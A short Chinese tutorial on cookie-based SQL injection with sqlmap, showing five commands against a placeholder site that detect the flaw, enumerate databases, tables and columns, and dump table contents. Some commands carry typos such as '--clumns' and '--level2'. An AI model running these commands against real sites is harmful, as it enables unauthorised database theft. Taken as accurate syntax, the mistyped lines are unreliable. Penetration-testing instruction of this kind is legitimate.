SQLmap————4、Cookie注入

说明：默认情况下SQLMAP只支持GET/POST参数的注入测试，但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数，当>=3的时候将检查User-agent和Referer，那么这就很简单了，我们直接在原有的基础上面加上 –level 2 即可！

1、判断是否可以注入

Sqlmap –u  http://www.xxx.com/cookie/test.asp  --cookie  id=1 --level 2

2、猜解数据库

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie  id=1  --dbs --level 2

3、猜解表

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie  id=1  --tables  --level2

4、猜解字段

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie id=1  –T  表名 --clumns  --level2

5、猜解内容

Sqlmap –u http://www.xxx.com/cookie/test.asp  --cookie id=1  –T  表名 -C  字段名  --dump  --level2